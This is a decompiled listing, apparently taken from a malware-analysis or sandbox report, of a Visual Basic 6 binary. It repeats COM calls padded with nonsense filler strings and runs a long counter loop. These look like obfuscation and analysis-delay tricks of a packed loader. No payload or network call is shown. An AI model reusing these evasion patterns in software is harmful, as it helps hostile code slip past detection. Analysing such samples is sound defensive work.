				_t1048 =  *((intOrPtr*)( *_v276 + 0x60))(_v276,  &_v240, _t1044,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x300))( *_v388));
				asm("fclex");
				_v280 = _t1048;
				if(_v280 >= 0) {
					_v392 = _v392 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b3c0);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v392 = _t1048;
				}
				if( *0x410010 != 0) {
					_v396 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v396 = 0x410010;
				}
				_t1052 =  &_v96;
				L004012E6();
				_v284 = _t1052;
				_t1056 =  *((intOrPtr*)( *_v284 + 0x60))(_v284,  &_v244, _t1052,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x314))( *_v396));
				asm("fclex");
				_v288 = _t1056;
				if(_v288 >= 0) {
					_v400 = _v400 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b438);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v400 = _t1056;
				}
				_v256 = 0x51842340;
				_v252 = 0x5afd;
				_v228 = 0x539c;
				_v136 = 0x70dd98;
				_v144 = 3;
				_v248 = _v240;
				_v200 = L"SIGNIFIKANSNIVEAUERS";
				_v208 = 8;
				L004012D4();
				_t140 =  &_v236; // 0x43683d
				 *((intOrPtr*)( *_a4 + 0x710))(_a4, 0x33d3c7, 0x132b94a0, 0x5b04, L"unrecumbently",  &_v128,  *_t140,  &_v248,  &_v144, _v244,  &_v228,  &_v256,  &_v264);
				_v76 = _v264;
				_v72 = _v260;
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012CE();
				_push( &_v144);
				_push( &_v128);
				_push(2);
				L00401334();
				_t1634 = _t1632 + 0x1c;
				if( *0x410010 != 0) {
					_v404 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v404 = 0x410010;
				}
				_t1077 =  &_v88;
				L004012E6();
				_v268 = _t1077;
				_t1081 =  *((intOrPtr*)( *_v268 + 0x178))(_v268,  &_v236, _t1077,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x308))( *_v404));
				asm("fclex");
				_v272 = _t1081;
				if(_v272 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b3c0);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v408 = _t1081;
				}
				if( *0x410010 != 0) {
					_v412 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v412 = 0x410010;
				}
				_t1085 =  &_v92;
				L004012E6();
				_v276 = _t1085;
				_t1089 =  *((intOrPtr*)( *_v276 + 0x120))(_v276,  &_v96, _t1085,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x314))( *_v412));
				asm("fclex");
				_v280 = _t1089;
				if(_v280 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40b438);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v416 = _t1089;
				}
				if( *0x410010 != 0) {
					_v420 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v420 = 0x410010;
				}
				_t1093 =  &_v100;
				L004012E6();
				_v284 = _t1093;
				_t1097 =  *((intOrPtr*)( *_v284 + 0xe0))(_v284,  &_v228, _t1093,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x308))( *_v420));
				asm("fclex");
				_v288 = _t1097;
				if(_v288 >= 0) {
					_v424 = _v424 & 0x00000000;
				} else {
					_push(0xe0);
					_push(0x40b3c0);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v424 = _t1097;
				}
				if( *0x410010 != 0) {
					_v428 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v428 = 0x410010;
				}
				_t1101 =  &_v104;
				L004012E6();
				_v292 = _t1101;
				_t1105 =  *((intOrPtr*)( *_v292 + 0xe8))(_v292,  &_v240, _t1101,  *((intOrPtr*)( *((intOrPtr*)( *_v428)) + 0x320))( *_v428));
				asm("fclex");
				_v296 = _t1105;
				if(_v296 >= 0) {
					_v432 = _v432 & 0x00000000;
				} else {
					_push(0xe8);
					_push(0x40b468);
					_push(_v292);
					_push(_v296);
					L004012EC();
					_v432 = _t1105;
				}
				if( *0x410010 != 0) {
					_v436 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v436 = 0x410010;
				}
				_t1109 =  &_v108;
				L004012E6();
				_v300 = _t1109;
				_t1113 =  *((intOrPtr*)( *_v300 + 0xf0))(_v300,  &_v112, _t1109,  *((intOrPtr*)( *((intOrPtr*)( *_v436)) + 0x314))( *_v436));
				asm("fclex");
				_v304 = _t1113;
				if(_v304 >= 0) {
					_v440 = _v440 & 0x00000000;
				} else {
					_push(0xf0);
					_push(0x40b438);
					_push(_v300);
					_push(_v304);
					L004012EC();
					_v440 = _t1113;
				}
				L004012C8();
				_t1635 = _t1634 + 0x10;
				_v248 = _v240;
				_v232 = _v228;
				L00401322();
				_v324 = _v96;
				_v96 = _v96 & 0x00000000;
				_v120 = _v324;
				_v128 = 9;
				_v244 = _v236;
				_t1121 =  &_v144;
				L004012C2();
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1129 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v244, 0x10,  &_v80,  &_v232,  &_v248, 0x1c0c4, _t1121, _t1121,  &_v256,  &_v144, _v112, 0, 0);
				_v308 = _t1129;
				if(_v308 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40b118);
					_push(_a4);
					_push(_v308);
					L004012EC();
					_v444 = _t1129;
				}
				_v60 = _v256;
				_v56 = _v252;
				L00401364();
				L004012CE();
				L00401334();
				_t1637 = _t1635 + 0x28;
				_v200 = 0x623610;
				_v208 = 3;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x714))(_a4, L"demideity", 0x10, L"snydertampenes", 2,  &_v128,  &_v144, 6,  &_v88,  &_v92,  &_v100,  &_v104,  &_v108,  &_v112);
				if( *0x410010 != 0) {
					_v448 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v448 = 0x410010;
				}
				_t1147 =  &_v88;
				L004012E6();
				_v268 = _t1147;
				_t1151 =  *((intOrPtr*)( *_v268 + 0x128))(_v268,  &_v236, _t1147,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x318))( *_v448));
				asm("fclex");
				_v272 = _t1151;
				if(_v272 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b438);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v452 = _t1151;
				}
				if( *0x410010 != 0) {
					_v456 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v456 = 0x410010;
				}
				_t1155 =  &_v92;
				L004012E6();
				_v276 = _t1155;
				_t1159 =  *((intOrPtr*)( *_v276 + 0x120))(_v276,  &_v96, _t1155,  *((intOrPtr*)( *((intOrPtr*)( *_v456)) + 0x310))( *_v456));
				asm("fclex");
				_v280 = _t1159;
				if(_v280 >= 0) {
					_v460 = _v460 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40b438);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v460 = _t1159;
				}
				_v328 = _v96;
				_v96 = _v96 & 0x00000000;
				_v136 = _v328;
				_v144 = 9;
				_v216 = _v236;
				_v224 = 3;
				_v200 = L"HALFPACE";
				_v208 = 8;
				L004012D4();
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v128, 0x10,  &_v144,  &_v256);
				_v36 = _v256;
				_v32 = _v252;
				_push( &_v92);
				_push( &_v88);
				_push(2);
				L004012CE();
				_push( &_v144);
				_push( &_v128);
				_push(2);
				L00401334();
				_t1639 = _t1637 + 0x18;
				if( *0x410010 != 0) {
					_v464 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v464 = 0x410010;
				}
				_t1179 =  &_v88;
				L004012E6();
				_v268 = _t1179;
				_t1183 =  *((intOrPtr*)( *_v268 + 0xb0))(_v268,  &_v92, _t1179,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x320))( *_v464));
				asm("fclex");
				_v272 = _t1183;
				if(_v272 >= 0) {
					_v468 = _v468 & 0x00000000;
				} else {
					_push(0xb0);
					_push(0x40b468);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v468 = _t1183;
				}
				_push(0);
				_push(0);
				_push(_v92);
				_push( &_v128);
				L004012C8();
				_t1640 = _t1639 + 0x10;
				if( *0x410010 != 0) {
					_v472 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v472 = 0x410010;
				}
				_t1188 =  &_v96;
				L004012E6();
				_v276 = _t1188;
				_t1192 =  *((intOrPtr*)( *_v276 + 0x148))(_v276,  &_v80, _t1188,  *((intOrPtr*)( *((intOrPtr*)( *_v472)) + 0x314))( *_v472));
				asm("fclex");
				_v280 = _t1192;
				if(_v280 >= 0) {
					_v476 = _v476 & 0x00000000;
				} else {
					_push(0x148);
					_push(0x40b438);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v476 = _t1192;
				}
				if( *0x410010 != 0) {
					_v480 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v480 = 0x410010;
				}
				_t1196 =  &_v100;
				L004012E6();
				_v284 = _t1196;
				_t1200 =  *((intOrPtr*)( *_v284 + 0x80))(_v284,  &_v236, _t1196,  *((intOrPtr*)( *((intOrPtr*)( *_v480)) + 0x314))( *_v480));
				asm("fclex");
				_v288 = _t1200;
				if(_v288 >= 0) {
					_v484 = _v484 & 0x00000000;
				} else {
					_push(0x80);
					_push(0x40b438);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v484 = _t1200;
				}
				if( *0x410010 != 0) {
					_v488 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v488 = 0x410010;
				}
				_t1204 =  &_v104;
				L004012E6();
				_v292 = _t1204;
				_t1208 =  *((intOrPtr*)( *_v292 + 0x170))(_v292,  &_v108, _t1204,  *((intOrPtr*)( *((intOrPtr*)( *_v488)) + 0x308))( *_v488));
				asm("fclex");
				_v296 = _t1208;
				if(_v296 >= 0) {
					_v492 = _v492 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40b3c0);
					_push(_v292);
					_push(_v296);
					L004012EC();
					_v492 = _t1208;
				}
				if( *0x410010 != 0) {
					_v496 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v496 = 0x410010;
				}
				_t1534 =  *((intOrPtr*)( *_v496));
				_t1212 =  &_v112;
				L004012E6();
				_v300 = _t1212;
				_t1216 =  *((intOrPtr*)( *_v300 + 0x60))(_v300,  &_v240, _t1212,  *((intOrPtr*)(_t1534 + 0x2fc))( *_v496));
				asm("fclex");
				_v304 = _t1216;
				if(_v304 >= 0) {
					_v500 = _v500 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b3c0);
					_push(_v300);
					_push(_v304);
					L004012EC();
					_v500 = _t1216;
				}
				_v168 = 0x23fd7a;
				_v176 = 3;
				_v244 = 0x8789b5;
				_v332 = _v108;
				_v108 = _v108 & 0x00000000;
				_v152 = _v332;
				_v160 = 9;
				_v336 = _v80;
				_v80 = _v80 & 0x00000000;
				_v136 = _v336;
				_v144 = 8;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v516 = _v236;
				_t1226 =  &_v128;
				L004012C2();
				 *((intOrPtr*)( *_a4 + 0x71c))(_a4, _t1226, _t1226,  &_v144, 0x8e1c83f0, 0x5af9, _t1534, 0x10, _v240,  &_v244,  &_v176,  &_v192);
				L004012BC();
				_push( &_v92);
				_push( &_v112);
				_push( &_v104);
				_push( &_v100);
				_push( &_v96);
				_push( &_v88);
				_push(6);
				L004012CE();
				_push( &_v176);
				_push( &_v160);
				_push( &_v144);
				_push( &_v128);
				_push(4);
				L00401334();
				_t1642 = _t1640 + 0x30;
				if( *0x410010 != 0) {
					_v504 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v504 = 0x410010;
				}
				_t1243 =  &_v88;
				L004012E6();
				_v268 = _t1243;
				_t1247 =  *((intOrPtr*)( *_v268 + 0x60))(_v268,  &_v236, _t1243,  *((intOrPtr*)( *((intOrPtr*)( *_v504)) + 0x304))( *_v504));
				asm("fclex");
				_v272 = _t1247;
				if(_v272 >= 0) {
					_v508 = _v508 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b3c0);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v508 = _t1247;
				}
				if( *0x410010 != 0) {
					_v512 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v512 = 0x410010;
				}
				_t1251 =  &_v92;
				L004012E6();
				_v276 = _t1251;
				_t1255 =  *((intOrPtr*)( *_v276 + 0xf8))(_v276,  &_v80, _t1251,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x300))( *_v512));
				asm("fclex");
				_v280 = _t1255;
				if(_v280 >= 0) {
					_v516 = _v516 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b3c0);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v516 = _t1255;
				}
				if( *0x410010 != 0) {
					_v520 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v520 = 0x410010;
				}
				_t1259 =  &_v96;
				L004012E6();
				_v284 = _t1259;
				_t1263 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v228, _t1259,  *((intOrPtr*)( *((intOrPtr*)( *_v520)) + 0x300))( *_v520));
				asm("fclex");
				_v288 = _t1263;
				if(_v288 >= 0) {
					_v524 = _v524 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b3c0);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v524 = _t1263;
				}
				_v248 =  *0x401140;
				_v120 = 0x1f4a08;
				_v128 = 3;
				_v256 = 0xb6a66b00;
				_v252 = 0x5aff;
				_v244 = _v236;
				_v240 =  *0x40113c;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v240, 0xf5a230c0, 0x5af3,  &_v244,  &_v256, L"Rearouses",  &_v128, _v80,  &_v248, _v228,  &_v264);
				_v68 = _v264;
				L00401364();
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012CE();
				_t1643 = _t1642 + 0x10;
				L00401352();
				if( *0x410010 != 0) {
					_v528 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v528 = 0x410010;
				}
				_t1280 =  &_v88;
				L004012E6();
				_v268 = _t1280;
				_t1284 =  *((intOrPtr*)( *_v268 + 0x50))(_v268,  &_v80, _t1280,  *((intOrPtr*)( *((intOrPtr*)( *_v528)) + 0x314))( *_v528));
				asm("fclex");
				_v272 = _t1284;
				if(_v272 >= 0) {
					_v532 = _v532 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40b438);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v532 = _t1284;
				}
				if( *0x410010 != 0) {
					_v536 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v536 = 0x410010;
				}
				_t1288 =  &_v92;
				L004012E6();
				_v276 = _t1288;
				_t1292 =  *((intOrPtr*)( *_v276 + 0x170))(_v276,  &_v96, _t1288,  *((intOrPtr*)( *((intOrPtr*)( *_v536)) + 0x308))( *_v536));
				asm("fclex");
				_v280 = _t1292;
				if(_v280 >= 0) {
					_v540 = _v540 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40b3c0);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v540 = _t1292;
				}
				if( *0x410010 != 0) {
					_v544 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v544 = 0x410010;
				}
				_t1296 =  &_v100;
				L004012E6();
				_v284 = _t1296;
				_t1300 =  *((intOrPtr*)( *_v284 + 0x60))(_v284,  &_v236, _t1296,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x300))( *_v544));
				asm("fclex");
				_v288 = _t1300;
				if(_v288 >= 0) {
					_v548 = _v548 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b3c0);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v548 = _t1300;
				}
				_v264 = 0xb47a6a0;
				_v260 = 0x5b01;
				_v152 = _v236;
				_v160 = 3;
				_v340 = _v96;
				_v96 = _v96 & 0x00000000;
				_v136 = _v340;
				_v144 = 9;
				_v240 = 0x2900f5;
				_v344 = _v80;
				_v80 = _v80 & 0x00000000;
				_v120 = _v344;
				_v128 = 8;
				_v256 = 0xf61631d0;
				_v252 = 0x5aff;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1314 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x10,  &_v240, L"Dlgsmaals",  &_v144,  &_v160,  &_v264);
				_v292 = _t1314;
				if(_v292 >= 0) {
					_v552 = _v552 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40b118);
					_push(_a4);
					_push(_v292);
					L004012EC();
					_v552 = _t1314;
				}
				L004012CE();
				L00401334();
				_t1645 = _t1643 + 0x20;
				_t1323 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 3,  &_v128,  &_v144,  &_v160, 3,  &_v88,  &_v92,  &_v100);
				asm("fclex");
				_v268 = _t1323;
				if(_v268 >= 0) {
					_v556 = _v556 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x40b0e8);
					_push(_a4);
					_push(_v268);
					L004012EC();
					_v556 = _t1323;
				}
				L148:
				L148:
				if( *0x410010 != 0) {
					_v560 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v560 = 0x410010;
				}
				_t1327 =  &_v88;
				L004012E6();
				_v268 = _t1327;
				_t1331 =  *((intOrPtr*)( *_v268 + 0x60))(_v268,  &_v236, _t1327,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x304))( *_v560));
				asm("fclex");
				_v272 = _t1331;
				if(_v272 >= 0) {
					_v564 = _v564 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b3c0);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v564 = _t1331;
				}
				if( *0x410010 != 0) {
					_v568 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v568 = 0x410010;
				}
				_t1335 =  &_v92;
				L004012E6();
				_v276 = _t1335;
				_t1339 =  *((intOrPtr*)( *_v276 + 0xf8))(_v276,  &_v80, _t1335,  *((intOrPtr*)( *((intOrPtr*)( *_v568)) + 0x300))( *_v568));
				asm("fclex");
				_v280 = _t1339;
				if(_v280 >= 0) {
					_v572 = _v572 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b3c0);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v572 = _t1339;
				}
				if( *0x410010 != 0) {
					_v576 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v576 = 0x410010;
				}
				_t1343 =  &_v96;
				L004012E6();
				_v284 = _t1343;
				_t1347 =  *((intOrPtr*)( *_v284 + 0x128))(_v284,  &_v228, _t1343,  *((intOrPtr*)( *((intOrPtr*)( *_v576)) + 0x300))( *_v576));
				asm("fclex");
				_v288 = _t1347;
				if(_v288 >= 0) {
					_v580 = _v580 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b3c0);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v580 = _t1347;
				}
				_v248 =  *0x401140;
				_v120 = 0x1f4a08;
				_v128 = 3;
				_v256 = 0xb6a66b00;
				_v252 = 0x5aff;
				_v244 = _v236;
				_v240 =  *0x40113c;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v240, 0xf5a230c0, 0x5af3,  &_v244,  &_v256, L"Rearouses",  &_v128, _v80,  &_v248, _v228,  &_v264);
				_v68 = _v264;
				L00401364();
				_push( &_v96);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012CE();
				_t1646 = _t1645 + 0x10;
				L00401352();
				if( *0x410010 != 0) {
					_v584 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v584 = 0x410010;
				}
				_t1364 =  &_v88;
				L004012E6();
				_v268 = _t1364;
				_t1368 =  *((intOrPtr*)( *_v268 + 0x50))(_v268,  &_v80, _t1364,  *((intOrPtr*)( *((intOrPtr*)( *_v584)) + 0x314))( *_v584));
				asm("fclex");
				_v272 = _t1368;
				if(_v272 >= 0) {
					_v588 = _v588 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40b438);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v588 = _t1368;
				}
				if( *0x410010 != 0) {
					_v592 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v592 = 0x410010;
				}
				_t1372 =  &_v92;
				L004012E6();
				_v276 = _t1372;
				_t1376 =  *((intOrPtr*)( *_v276 + 0x170))(_v276,  &_v96, _t1372,  *((intOrPtr*)( *((intOrPtr*)( *_v592)) + 0x308))( *_v592));
				asm("fclex");
				_v280 = _t1376;
				if(_v280 >= 0) {
					_v596 = _v596 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40b3c0);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v596 = _t1376;
				}
				if( *0x410010 != 0) {
					_v600 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v600 = 0x410010;
				}
				_t1380 =  &_v100;
				L004012E6();
				_v284 = _t1380;
				_t1384 =  *((intOrPtr*)( *_v284 + 0x60))(_v284,  &_v236, _t1380,  *((intOrPtr*)( *((intOrPtr*)( *_v600)) + 0x300))( *_v600));
				asm("fclex");
				_v288 = _t1384;
				if(_v288 >= 0) {
					_v604 = _v604 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40b3c0);
					_push(_v284);
					_push(_v288);
					L004012EC();
					_v604 = _t1384;
				}
				_v264 = 0xb47a6a0;
				_v260 = 0x5b01;
				_v152 = _v236;
				_v160 = 3;
				_v348 = _v96;
				_v96 = _v96 & 0x00000000;
				_v136 = _v348;
				_v144 = 9;
				_v240 = 0x2900f5;
				_v352 = _v80;
				_v80 = _v80 & 0x00000000;
				_v120 = _v352;
				_v128 = 8;
				_v256 = 0xf61631d0;
				_v252 = 0x5aff;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t1398 =  *((intOrPtr*)( *_a4 + 0x704))(_a4,  &_v256, 0x10,  &_v240, L"Dlgsmaals",  &_v144,  &_v160,  &_v264);
				_v292 = _t1398;
				if(_v292 >= 0) {
					_v608 = _v608 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40b118);
					_push(_a4);
					_push(_v292);
					L004012EC();
					_v608 = _t1398;
				}
				_push( &_v100);
				_push( &_v92);
				_push( &_v88);
				_push(3);
				L004012CE();
				_push( &_v160);
				_push( &_v144);
				_push( &_v128);
				_push(3);
				L00401334();
				_t1648 = _t1646 + 0x20;
				if( *0x410010 != 0) {
					_v612 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v612 = 0x410010;
				}
				_t1408 =  &_v88;
				L004012E6();
				_v268 = _t1408;
				_t1412 =  *((intOrPtr*)( *_v268 + 0x128))(_v268,  &_v236, _t1408,  *((intOrPtr*)( *((intOrPtr*)( *_v612)) + 0x318))( *_v612));
				asm("fclex");
				_v272 = _t1412;
				if(_v272 >= 0) {
					_v616 = _v616 & 0x00000000;
				} else {
					_push(0x128);
					_push(0x40b438);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v616 = _t1412;
				}
				if( *0x410010 != 0) {
					_v620 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v620 = 0x410010;
				}
				_t1416 =  &_v92;
				L004012E6();
				_v276 = _t1416;
				_t1420 =  *((intOrPtr*)( *_v276 + 0x120))(_v276,  &_v96, _t1416,  *((intOrPtr*)( *((intOrPtr*)( *_v620)) + 0x310))( *_v620));
				asm("fclex");
				_v280 = _t1420;
				if(_v280 >= 0) {
					_v624 = _v624 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40b438);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v624 = _t1420;
				}
				_v356 = _v96;
				_v96 = _v96 & 0x00000000;
				_v136 = _v356;
				_v144 = 9;
				_v216 = _v236;
				_v224 = 3;
				_v200 = L"HALFPACE";
				_v208 = 8;
				L004012D4();
				L004011F0();
				_t1622 =  &_v224;
				_t1609 = _t1648;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v128, 0x10,  &_v144,  &_v256);
				_v36 = _v256;
				_v32 = _v252;
				_push( &_v92);
				_push( &_v88);
				_push(2);
				L004012CE();
				_push( &_v144);
				_push( &_v128);
				_push(2);
				L00401334();
				_t1645 = _t1648 + 0x18;
				if( *0x410010 != 0) {
					_v628 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v628 = 0x410010;
				}
				_t1440 =  &_v88;
				L004012E6();
				_v268 = _t1440;
				_t1444 =  *((intOrPtr*)( *_v268 + 0xf8))(_v268,  &_v80, _t1440,  *((intOrPtr*)( *((intOrPtr*)( *_v628)) + 0x308))( *_v628));
				asm("fclex");
				_v272 = _t1444;
				if(_v272 >= 0) {
					_v632 = _v632 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b3c0);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v632 = _t1444;
				}
				L00401322();
				_v236 = 0x43683d;
				_v360 = _v80;
				_v80 = _v80 & 0x00000000;
				_v120 = _v360;
				_v128 = 8;
				_t1452 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v128,  &_v236,  &_v84);
				_v276 = _t1452;
				if(_v276 >= 0) {
					_v636 = _v636 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40b118);
					_push(_a4);
					_push(_v276);
					L004012EC();
					_v636 = _t1452;
				}
				L00401364();
				L004012DA();
				L00401352();
				_t1454 = _v28 + 1;
				if(_t1454 < 0) {
					goto L213;
				}
				_v28 = _t1454;
				if(_v28 < 0x1ab0b) {
					goto L148;
				}
				_t1472 =  *((intOrPtr*)( *_a4 + 0x708))(_a4);
				_v8 = 0;
				asm("wait");
				_push(E0040E1E1);
				L00401352();
				return _t1472;
				L213:
				L004012FE();
				_t1650 = _t1645 - 0xc;
				 *[fs:0x0] = _t1650;
				L004011F0();
				_v1044 = _t1650;
				_v1040 = 0x401160;
				_v1036 = 0;
				 *((intOrPtr*)( *_v1024 + 4))(_v1024, _t1609, _t1622, _t1478, 0x4c,  *[fs:0x0], 0x4011f6, _t1629);
				if( *0x410010 != 0) {
					_v100 = 0x410010;
				} else {
					_push("`os");
					_push(0x40a810);
					L004012E0();
					_v100 = 0x410010;
				}
				_t1592 =  *((intOrPtr*)( *_v100));
				_t1463 =  &_v32;
				L004012E6();
				_v84 = _t1463;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t1650 =  *0x401158;
				_t1469 =  *((intOrPtr*)( *_v84 + 0x178))(_v84, _t1592, 0x10, 0x10, 0x10, _t1463,  *((intOrPtr*)(_t1592 + 0x318))( *_v100));
				asm("fclex");
				_v88 = _t1469;
				if(_v88 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b438);
					_push(_v84);
					_push(_v88);
					L004012EC();
					_v104 = _t1469;
				}
				L004012DA();
				asm("wait");
				_push(E0040E345);
				return _t1469;
			}

0x0040c11a
0x0040c11b
0x0040c11d
0x0040c12c
0x0040c138
0x0040c140
0x0040c143
0x0040c150
0x0040c159
0x0040c164
0x0040c167
0x0040c16c
0x0040c174
0x0040c17a
0x0040c184
0x0040c18e
0x0040c198
0x0040c1a5
0x0040c1b2
0x0040c1b3
0x0040c1b4
0x0040c1b5
0x0040c1b9
0x0040c1c6
0x0040c1c7
0x0040c1c8
0x0040c1c9
0x0040c1d2
0x0040c1d8
0x0040c1da
0x0040c1e7
0x0040c209
0x0040c1e9
0x0040c1e9
0x0040c1ee
0x0040c1f3
0x0040c1f6
0x0040c1fc
0x0040c201
0x0040c201
0x0040c1e7
0x0040c217
0x0040c234
0x0040c219
0x0040c219
0x0040c21e
0x0040c223
0x0040c228
0x0040c228
0x0040c258
0x0040c25c
0x0040c261
0x0040c279
0x0040c27f
0x0040c281
0x0040c28e
0x0040c2b3
0x0040c290
0x0040c290
0x0040c295
0x0040c29a
0x0040c2a0
0x0040c2a6
0x0040c2ab
0x0040c2ab
0x0040c2c2
0x0040c2c7
0x0040c2d4
0x0040c2da
0x0040c2e4
0x0040c2e7
0x0040c2f2
0x0040c305
0x0040c30b
0x0040c318
0x0040c33a
0x0040c31a
0x0040c31a
